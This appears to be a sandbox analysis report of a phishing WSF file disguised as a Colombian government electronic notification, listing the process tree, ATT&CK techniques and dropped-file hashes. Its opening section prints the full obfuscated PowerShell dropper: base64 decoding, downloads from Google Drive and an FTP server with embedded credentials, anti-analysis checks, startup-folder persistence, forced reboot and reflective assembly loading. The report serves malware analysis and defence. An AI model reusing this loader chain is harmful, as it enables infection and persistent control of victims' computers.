'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'qAE0ATw' + [char]66 + '6AEgAJA' + [char]66 + '7ACAAKQAgAEMAZQ' + [char]66 + 'PAEkAYwAkACAAKAAgAGYAaQA7ACAAKQAyACgAcw' + [char]66 + 'sAGEAdQ' + [char]66 + 'xAEUALg' + [char]66 + 'yAG8Aag' + [char]66 + 'hAE0ALg' + [char]66 + 'uAG8AaQ' + [char]66 + 'zAHIAZQ' + [char]66 + 'WAC4AdA' + [char]66 + 'zAG8AaAAkACAAPQAgAEMAZQ' + [char]66 + 'PAEkAYwAkACAAOwA=';$nymcr = $nymcr.replace('уЦϚ' , 'B') ;;$cpdfb = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nymcr ) ); $cpdfb = $cpdfb[-1..-$cpdfb.Length] -join '';$cpdfb = $cpdfb.replace('%XRqhI%','C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF');powershell $cpdfb
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3920
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $cIOeC = $host.Version.Major.Equals(2) ;if ( $cIOeC ) {$HzOMj = [System.IO.Path]::GetTempPath();del ( $HzOMj + '\Upwin.msu' );$nmqfv = 'https://drive.google.com/uc?export=download&id=';$Xumfi = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $Xumfi ) {$nmqfv = ($nmqfv + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$nmqfv = ($nmqfv + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$zvjwq = (New-Object Net.WebClient);$zvjwq.Encoding = [System.Text.Encoding]::UTF8;$zvjwq.DownloadFile($nmqfv, ($HzOMj + '\Upwin.msu') );$UwfwZ = ('C:\Users\' + [Environment]::UserName );JCCGX = ($HzOMj + '\Upwin.msu'); powershell.exe wusa.exe JCCGX /quiet /norestart ; Copy-Item 'C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF' -Destination ( $UwfwZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };$nqcnz = ('ftp://[email protected]/Upcrypter' + '/01/DLL01.txt' );$JukpV = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$LQQAB = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($LQQAB, $lllGq) ;$RVUXv = $webClient.DownloadString( $nqcnz ) ;$RVUXv | Out-File -FilePath $JukpV -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $JukpV ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$aeDwU = '$sNwoM = ''C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF'' ; $ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$aeDwU += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$aeDwU += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$aeDwU += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$aeDwU += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''0/zpfHt/d/ee.etsap//:sptth'' , $sNwoM , ''DDDMSBuild'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$aeDwU | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3996
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe JCCGX /quiet /norestart
        6⤵
        
        PID:4048
        
        C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" JCCGX /quiet /norestart
        7⤵
        
        PID:2120
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2416

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:2900

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

Filesize
914B

MD5
e4a68ac854ac5242460afd72481b2a44

SHA1
df3c24f9bfd666761b268073fe06d1cc8d4f82a4

SHA256
cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

SHA512
5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

Filesize
252B

MD5
129ee4a58f6f94c07a97ab58f548ae95

SHA1
ca4f1c6a3f10dc5cc5bcccc8d9359c951de0eade

SHA256
26135c3084222b88261a254e370a7e448e915174cd5136972c8a495d4720fbbd

SHA512
49937254e483cd13b026628e3668fe82750acb076475ee4df95fd1f1c8c32e1d3c1c0dfe1204c19c4bc5389638b2cb57f71d2e18ef7a7cad44ba6795df252e4f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
bcfa1135a44e3dc90b4f07ffc3b5a680

SHA1
3d68cc014384a46dd7ca0fd6a04c30de817b1408

SHA256
3ad231751747007ed2dfffa1d67946863b8b7cd6ec8394d6106599de2e97ca79

SHA512
36d90397d4f37908ae0e74739720d6ad90d21155f9e9c610f066b1a84ff6f386b067998fd775e220b970905c84eb975dc32bd7cc340ed9a7d81a0f9596d4a468

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
05a731acea8c8d7fa500dec0b13c2299

SHA1
b006e5a5b101ce463a7bffa8410e0237a4acd892

SHA256
b6a5616e3519c7f709f2007fb50c1083940a393fa6d463f958653a05144bd5e9

SHA512
4cb5c487dd667b1b08948bffe2ca3580a2543e7130a7e6c1de152d80c791b5be04fe5ac542ec4a83caa34b705103eff6a845102e46c97ca8a7e85e495fd653b5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
b76d4b79a46ae9e8a92e16c7715f2ae8

SHA1
279c4e0a00581751002e1b1db09f38b00c15dbd1

SHA256
13026fba16b430d8a684834d6815329556de2d3cc78843d8534857a9084ed99b

SHA512
9e3dd67d002f63010ebbf08ba337ffdf6f2246c5a1e1a472e65bf2d0c5046751323952951e3bbfef18caca44f7c337358f01a29878a1cd5966b1ab16375257c8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
9fadd909ad430bb16dd157e52c396364

SHA1
64649875e85999ddf27447daa977904085c0d10a

SHA256
f1dc213b9b2bd18dc660734e662f6ec726815711009ee174f92dd815973333c0

SHA512
cbad8d86b7dd8968fb1908ce12a02b3824c629735720f53f9ce2e78d1c03122260c9d7970fff84b3f4879a907e9d0c8875a97398213ad3fd9aafd25e87656ac1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
8ca7f0c61d530707db5161ebe45a573e

SHA1
957b4466df33f08170030e9ebc14983a95da60ff

SHA256
5588720473a46d22f325be984c7e1531632fc611f9d70d47ea593f045ca0c2ba

SHA512
410277b116e9b8d3bf912c83745241da368cfbd2def88108dfd049862ddafb926e7dd30a1e815cf7c8e7ecce6f284fcf7abfdb52e6411f32273d8accbe6e48c0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
bc3875a6fe57025fa3edcfe6442a814c

SHA1
d4ce3e64fb081e5e2fc8adfa09b569a35912d584

SHA256
aefb55ea78284006b9628d952f8917a632fdbe3a7af9bcf4c2a80194713aa5b1

SHA512
20dc1c7903601cd092945c0bdcc3ad5150c913f7435c559414c243afbfd2e31362a786b46100a29fd28ca91666fe9f10005f125900e5037f848ba4cd6357f7ea

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
07b958232849936fc0c0b0cf9fec4597

SHA1
8f24a999795fc9266cd4945f34bffc4dce5b0273

SHA256
b7c97c29eade46ffe4329a21212cf3b075e6498bae32b8faa2d8736fa715abb5

SHA512
252894b3302c6e015d29a1ca8f33f077f81389762fccb202af1ecac3708bfaef584bd3645aacb5b117c814f449008b31ae42cd2c978ce5fe1257ff9649457144

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
a9def9746c6d4404b8c5691de45bfdeb

SHA1
db0f331f2e08903e712b02871a2fc35d32eb34cb

SHA256
063259d00a530670e031330238bdd0ac751ef24d5827af00daa63d0cfc498489

SHA512
7f4ba7f97f0d679d7abad9b9beaf0986bdc3e9398dd59c74924fb78f43c615b7f166a5717c56be024fc31a5fa01e80a7a64754d82d02da7bf8626a4370c28f1b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
ae03a55379933864fc798fa9f6d3e04d

SHA1
ae36b9d274e57d1f66678c56059a4609d3c61381

SHA256
b949acbb5295a2191b2e6ded95bfe6a7c3206d6141f9dd95b79f89fa3e24bded

SHA512
48532d0a5c35aac49a96fe02c2f5eef7a32200b69aa4c800b3dc50ded8f729c3300167401526760cd18e5796776daca1b1db7c0172cebd9abd6e701e92c70978

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
429449a6a6ee2dd3a9035d69e618ce80

SHA1
552cda63e2244806649c920d8305bb42509af8d4

SHA256
29eaf10a6a982cdf550af79df5227335f287c7e9041bd96a26cfb1cf29143f15

SHA512
907de90469862618ca60299498712aeabd4c9f3503add78aa2f74bbe4911353291cd161bd881af9f4af9ec8c9dc8276c94f8ee2e6413981eb71ec7a080d1cf29

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
6d08999aa7eeaa46b0dacddd837978c1

SHA1
46f516428cc24b76aad3c8597704cc4b161aac1b

SHA256
8068d8d886a6682114f7f682b7e9e00cd4725dee7b2ae0393ca86ee4fa5067d2

SHA512
67352ff185d23aaa12ad5adb7248ba05119f1126eca6177a7c7b7364699d3b5e04f158fbe55242d968c6ea47a465f5b1779c13ff30e46c2cac658b50e10792e4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
903e95cd45bd79f81e7c03c8f11c9c74

SHA1
70e1bb8dc21ea3cb072dfe6f0d088a5f0e8b6f37

SHA256
c106807acbc6b79d27965b6a3b345985b05636823c12d6add3fd53ad40ec3d5a

SHA512
a0be8e3f844f20200ac7f37236e53aa240e497dfbd9f9262dc95b95000e8ddf6e6aa514ae9645af4f708fa939a9c2cf3bdec8b01443cc427b00eae6c4c66334c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
034274939f603df80280d8a5bd45a8f2

SHA1
3c592f987cb864de024d261b4f8c42cfed8ccf39

SHA256
c87b37d9da3a0e654ddbedeefa3c8f489be6dc75362c8742254a39e3dfad4c78

SHA512
df29fe9417ba5a2d236b2d04dd2b01e193ba9f3a6b30c0a1f9b2645d1d200af245660a0df6697651ca6447dd33ebc21a10df1cbdfc7fa9418f98a14b8e2b1d5d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
9f5e8b9455dd652b4f5c8f7150e245bd

SHA1
e34dc9f2ad7d9391774c671578d0b954949be7da

SHA256
8908d65582362c52413aeac86588e2f71b0735afc98b574300d2558d77d1329b

SHA512
592803257823e113ff9d0b7ebe2ce2d75f426ea0f3e5b8629fb3b98c0cf7e2c8af543f17aa4d370a7cccdf5a18d41a1c5ad491f31da6fa38a186701c66174cfd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
5084e55b34a03d3fd4bd09f434c2bf00

SHA1
ff60f2865ffda075c5a22b16f4813a37a333a3fe

SHA256
3498c3e1ed48036c1f982ce47b383afabc16e1856ad6f1284124c00d4442e58e

SHA512
c467b8dfc681404fe401d9c245f8fc7108dbf91c74b2d4e70fa9df3386a4be43ff81f153d6695de67366dcc624ca0aed2ed65bd2751c6e8b631d065ebc10c743

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
d15bd114f056c636bb05b2db3c3faa63

SHA1
6ddd3284e9fc1491288669fb2a9bf7dd54db0eb1

SHA256
ae7ab2d07831f0de4b4787333d9d41d9bdbf31ea5a369b3a283c8a904c8bd8ec

SHA512
bf99683d2de0c7485e6b2017b8b7e2387d6e3b976c15540d2769f289b54c4c2fc1ad9988e0cd3e56498ea0451a85f32317465c524d755e08a70ce85eb35f7ddb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
66a65c00ed1b391efd77ff6fe523d400

SHA1
21dbba38cb8fb5452f880871f7690d927fbd96bd

SHA256
cb1e483f4ca75cda0233c9988a03ba19ea6d058043825de150d4a844f02cefa3

SHA512
69963bf9e38d0f2055a860305cb4773f5456035862bd204122cbc3257d5280fd6fd7f84fde3a69676e33e75af8f9d112a538554ca387f6e5516fb09fe823f280

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
3c1695e4f7b70f70564d34b0039f8133

SHA1
bdfbc3d10afc78f17c887dcac38855995105f8f0

SHA256
4b90b9b421e7f16274ace8b794b46704a7aa6db5100af5daac0d97e9d2e1f5b0

SHA512
958a2f54e9bd40d20252adf254605c7972bb25f3df1edd0f4e9bf4865939ee58f8bb2385cabc64081594c366e5928e41b4324260fbe9661a868301dd14e6ea74

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
43230e889a195879569dd000c4b7735d

SHA1
89fc74ba73a27b5048f99ec6b7de1ad639438be7

SHA256
95df8154a10326fcb48585b1a1188462c269e04847d3a6360ede5295d5d8953e

SHA512
08c28578e90bfa657cbbc345b8e1a19437f4359d9aca348e1ed92cbae718cfe50acd14e7d14d00e978ce06d4e64b5ccf1d4a0e8bff9427a232de86393ed5aee1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
242B

MD5
bf96e0b50c5ad92fe3ab9215cf67b773

SHA1
a27f41ffdfbc57dcd362cc26146e072e7a2a0f43

SHA256
e580457a410ba7457418b88b6fcdbb6f9a6d2bbe6aaea1222daf087c1f5c86d5

SHA512
4823bf80e304cd5e7a61a94ee61c3b72db2ef9aa7c9a1aa36da7f49b47872a2911431c6c610f1bd3d2b237fa405c9f034cedc04854dba12cc74cf296e6584e38

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\78076te\imagestore.dat

Filesize
1KB

MD5
7d1047b0ec053e73cdc8a01cfa927792

SHA1
0a5d4eb2185153596faa1ccea1f10420a0c255f9

SHA256
f8925e93325a038a16c87277518876c51832e2866903aa52d969c872ed797b75

SHA512
69dbc3c158866f21ac54665b41bc0c456ead0a4004d2f0cf4fb7b4d75978087d6d5801e492366db816e0fc748b25681eb0189dbc3a75987c0c094cf7a2a53e2a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7BQ20K5D\NOTICIACION%20ELECTRONICA%20Procuraduría%20Delegada%20para%20las%20Entidades%20Territoriales%20y%20Diálogo%20Social[1].WSF

Filesize
34KB

MD5
47d95f32663a9f54691aa7ebc8ea72c9

SHA1
04a1c7712c45ad063e392576b6fe9cecbe0c88ee

SHA256
96bd54f55882408d1e4daeb7190424321b7e2f6b629a0dadbd12afae4331224a

SHA512
58d38b5a7a66d29b2b94ee5e5c32256eb3c5f083da64b45d9a2bc56253412ec17702dd118e3da249988c479938416b584ace5b9a77c6ea0d404298090ed0af55

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7BQ20K5D\drive_2022q3_32dp[1].png

Filesize
1KB

MD5
c66f20f2e39eb2f6a0a4cdbe0d955e5f

SHA1
575ef086ce461e0ef83662e3acb3c1a789ebb0a8

SHA256
2ab9cd0ffdddf7bf060620ae328fe626bfa2c004739adedb74ec894faf9bee31

SHA512
b9c44a2113fb078d83e968dc0af2e78995bb6dd4ca25abff31e9ab180849c5de3036b69931cca295ac64155d5b168b634e35b7699f3fe65d4a30e9058a2639bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabF50A.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarF51C.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Upwin.msu

Filesize
2KB

MD5
9bf052954c6660b1d996d68cf8c09fe0

SHA1
475697f1a8ffba801d3d503b6e20356d7082503f

SHA256
02459e6df8c5e56cd386d454a2fe801e72d48b2efd25b8109b987a6e0d9eb268

SHA512
4b121bed93aa0c7e4e470ba30afa85e79d6f031e269dfeb2a51ca1bf6ab0bcbe8cf9e5d253e98b24c93f4e76ce8e5954b7c2d405577a1aaf7bb701e035313154

Download Submit
C:\Users\Admin\AppData\Local\Temp\Upwin.msu

Filesize
2KB

MD5
c504c8c7e83f87d9e5ce7eec84f40202

SHA1
e7fb0575268871e8ebd861404adfe81a7dd1a08c

SHA256
3081d6a74fa89ddd63582a1b18701c325d9be14a2e2c5b8a09df6003165eb032

SHA512
7a92203f6941b928b4031562f4cb11bc65ccf5f2c7e4f5b287387b7ed6d92e323d8fd948795ab6221aad56284014f482c7579f343294a234b8946df88ff58cd1

Download Submit
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

Filesize
3KB

MD5
f7d734473b69e67f3416d38050af69e6

SHA1
7e64a996c9bc9a85f12a1b6acc608d5f4d9738e0

SHA256
28a9ac63ea1d341c0285c42edd0a5f550be0e3848fc063905e9e2da093cc40f9

SHA512
c7d603414a89d3ae8911e45389115fe27a8d7413939ca71f3b72542ec9ac43ecc3a1209d6fc451a568068f22ee5ddb424afc70d30340b55d25c58b483b704e32

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
788c925b28c5c0cde9b79b1f7daf52a8

SHA1
24a122741a56d6d765e7b9fc530269977a849a04

SHA256
b3357e1b26dd50fb303c5fcba5231ccee4b5858e94655ec9e664b2dae37d1c59

SHA512
b9cc4b60ab28fd854d35b9372a640d4429d47b7897c124676d830585738752256d4b99de127c3487ebd3acb7c6f299cf7e09682da64fc3c3615fc4bb06e20389

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
4e47a29914331752a0ba68963f4e91c7

SHA1
133d083b72d5417fb43f666893ddfbd4a7c4b80c

SHA256
bc3ca21990574c9ad2c49bd5d10e79a2e64a74b9c30909bbb7f4abcb4e384980

SHA512
63379142a4e085ce2e8498c5e33bc5bb8b25078488f3c188db4d7052bcf63cc763b6177f88b8ad72c3e0afc7a00c6ef5fed5204d66b938bc11c6d9265d807a94

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
920cf2a4406422b530181d9346652aa8

SHA1
bb7b532699495cfb1b6d743903e027d64ee09927

SHA256
8351eb0a9864df2218a47ebf4ddaba7c98ede3ccfca95679c0a01478358d4546

SHA512
dc4d1a02af1fd17e6216d874ed0ccef4f39166f268ad337c9ec865d53072c6242e6797aaed0ab15aa2fcc1a2e7ae95fbc269915d43423ebf0f1b7b5d8f56058c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
b2261854d6e67dcd2a94fb4003454284

SHA1
4776c8769b33d6a8824cae17b7a482ac7eaad384

SHA256
e0b637d0943c5d8af1c8b0e9fdc358ab71a452a09e4572133ade618c96553c25

SHA512
93cc6b43ac29636dc60b2c49f7f7d05a380ffd3f36d27ac4611fca15f8bde18b3267205b8f76e2a97b672cc772d075484f4a0b3b9375dcf47f682ab8f355f783

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f05fb5d8d93eb2ceacf248462f66637a

SHA1
52134bf05bddc7f7f0cc243e0848c23a78bac664

SHA256
723a6dc1dbe60e9c5f7b54411aefb3757db565686f4d2ad2e45ab5098601e89e

SHA512
761bba14de661d541f6433ac2bb2480ed4ddc9504c4dbc022ba2b2736cac546c6cb9006b2897368848977d5bcf76620019e448278715bf208bcd22e4283d43ef

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
db2df92c658a126f07c2f8ee70e2dd73

SHA1
2589433f1c46ba93a3a2ff2f2fd3f6369f57963e

SHA256
00362e2926a9a0804ed4f3fcdaed43ee3ff7cd569f1f4757775e671477fe38d8

SHA512
13235fa5d3d3caa838289bed594f3344f0a10c01175f36d4db68b40ec05e7ee65912902987bbd88d2b303efe625c27da5b3b68ad92a87d852fa0ed0c52afc158

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
7abdb3728da5ea75cb911e4fa07cd3c3

SHA1
acc0f9ace29f7f0c4d43f35b664b674ad941a7a7

SHA256
0b257753a42d321355145bb1d02611b3f5cefc316f9547e2ac512b5a8f60353f

SHA512
e06dd63187ff9cccd2a11def28f49f8c792a69ea7d9033e1c49ce5240c94f08db4a0c17a17fcb833f837478b5421305c89cc7c0d4e8d0c171529c15c5d0d9924

Download Submit
C:\Windows\Logs\DPX\setupact.log

Filesize
6KB

MD5
8eeab8d990ef4ad24e73cca02d448feb

SHA1
c090e973ae5ac143808fbd874fb17197a8b69d9a

SHA256
b238bc8b9524ec0287e7c247b59c22682ade4f15f1f516d72ffd625146101ccb

SHA512
52578d880324e7a2960f5180113ad1cd762ef277d363c31353cfaec8b93bdff617f7ffd81f6a31bc2506478fdcc01a2e573bbafefe6d701a8fd29288591f5cad

Download Submit
C:\Windows\Logs\DPX\setupact.log

Filesize
7KB

MD5
d464944371a576ac0f36dea2cf88ada2

SHA1
24ce9226f5dca66954cad9820501ee7ec4bea0d2

SHA256
59f2ab7c86691a8d3d343502607f856a1935ef7878c4686f4dc7b5b3a3a29750

SHA512
06dfafccc0e45c20e393503073cbaae7fde446cff96bffa04349413a08ccd2402a0d16504b011e47676f257db553a736c2616a5a7e1e2696295bccd1c378ad64

Download Submit
C:\Windows\Logs\DPX\setupact.log

Filesize
8KB

MD5
011de3c13737b88d4ff08a37928f7ddd

SHA1
ab7f1c2d5af3e32b5efb8acd4c896ef69abc2dbc

SHA256
582316483a2ee195b2476458c61032702ae0db66a12c35a3fd9860e6abebc565

SHA512
8356ee46ad3a0e1bd83183c56dc9e55fb1c8b7135c31a95dbbc9aba12e05395bf76f7f7eb85289da9b7debf2c4a17d6b3f7fd6fa66991809456fa9b4d3ebe977

Download Submit
C:\Windows\Logs\DPX\setupact.log

Filesize
8KB

MD5
fdbbc2029f8730fc6676bf1409713ab9

SHA1
2ab9e1272a115b37f12af3a7e08eef1e0daccbac

SHA256
92ee44c41659c12bb40874e16c6c218e77ec77d273a72a30bd0378b92c62514b

SHA512
a702344794206fbbb7497265e0b0f768633c57e2e456c6d9bd7fb8a3036667df7642f098560931e1b2e44d534e3827fe533497286d98137bfb00f422fb925c6b

Download Submit
C:\Windows\Logs\DPX\setupact.log

Filesize
9KB

MD5
70878e0b2b26547ee9ab1a6577bfbc68

SHA1
bb82ee8d779f5f78e492f23c50c1f923c30cff1a

SHA256
91f477be9b6e95e002fda7a2e3672b243e782a68b51fb76110672db73e854ac0

SHA512
9d5675e3c810bbfb5dd2d3acc2feedcecd0a227f266f374d9d52a4e0e45f9f862c39d46342f99abb90fb4c5f7387c814b59376e10881926c08c9eb6680c3489b

Download Submit
C:\Windows\Logs\DPX\setupact.log

Filesize
10KB

MD5
96467faa3df1d40182d4ce5a8ac5a964

SHA1
2640ce1063ec05730ef66a46891f09d29a50c903

SHA256
101cc552ec452e62ffc36567d76a7d2e6875a5f1151dc5ada01f774c36e2bf43

SHA512
745d47458f23f0bca37d3806888bd69adaa8dd83866976da7d1e9b3b85dd249d0a83ed84be01b3329493ad12875d39171ea4f07034a9d7e654e43403898c8fb0

Download Submit
memory/316-504-0x0000000001F00000-0x0000000001F08000-memory.dmp

Filesize
32KB

Download
memory/316-503-0x000000001B580000-0x000000001B862000-memory.dmp

Filesize
2.9MB

Download